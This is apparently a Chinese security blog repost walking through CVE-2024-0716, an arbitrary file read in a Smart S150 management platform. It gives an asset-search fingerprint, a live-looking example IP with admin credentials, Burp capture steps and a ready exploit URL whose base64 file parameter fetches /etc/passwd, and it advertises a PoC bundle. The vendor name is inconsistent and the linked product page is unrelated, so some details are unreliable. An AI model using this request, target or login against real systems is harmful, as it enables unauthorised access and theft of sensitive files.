CVE-2024-0716漏洞挖掘过程学习

admin 2024年1月23日10:33:35评论22 views字数 992阅读3分18秒阅读模式

使

应粉丝要求小编将往期poc和我在网上收集的一些poc打包分享到网盘了。同时分享了大量电子书和护网常用工具,在文末免费获取。

01

漏洞名称

北京百绰智能S150管理平台download.php任意文件读取漏洞

02

漏洞影响

北京百川智能S150管理平台V31R02B15

产品页面

https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html

CVE-2024-0716漏洞挖掘过程学习

03

漏洞描述

北京百川智能S150管理平台V31R02B15中备份文件处理程序的/log/download.php文件存在安全漏洞。在配置了备份文件的地方,没有对下载文件的参数进行过滤,这可能导致下载任意的敏感文件,如passwd。攻击者可以利用此漏洞远程发起攻击,并可能导致信息泄露。

04

影响资产范围
title="smart--管理平台"

CVE-2024-0716漏洞挖掘过程学习

CVE-2024-0716漏洞挖掘过程学习

05

漏洞挖掘过程

示例站点

https://218.205.129.204:8443/patrolflow.php

注意:这个站点在本地由于防火墙原因可能打不开,但在虚拟机中可以正常访问

首先登录设备,用户名密码如下

admin/b3f9t8k7

CVE-2024-0716漏洞挖掘过程学习

点击设备管理一配置管理一下载备份文件

CVE-2024-0716漏洞挖掘过程学习

然后使用burpsuite捕获数据包

CVE-2024-0716漏洞挖掘过程学习

CVE-2024-0716漏洞挖掘过程学习

可以看到下载的文件名

然后将文件名参数更改为passwd时,我们发现设备仍然执行我们的请求并下载passwd文件

CVE-2024-0716漏洞挖掘过程学习

CVE-2024-0716漏洞挖掘过程学习

漏洞url如下

https://x.x.x.x:8443/log/download.php?local=yes&type=filedown&file=L2V0Yy9wYXNzd2Q=&filename=passwd

参考原文链接如下:

https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md

06

修复建议

联系厂商获取补丁。不过厂商早已被通知但未做出任何回应。

07

原文始发于微信公众号(AI与网安):CVE-2024-0716漏洞挖掘过程学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月23日10:33:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-0716漏洞挖掘过程学习http://cn-sec.com/archives/2421012.html

发表评论

匿名网友 填写信息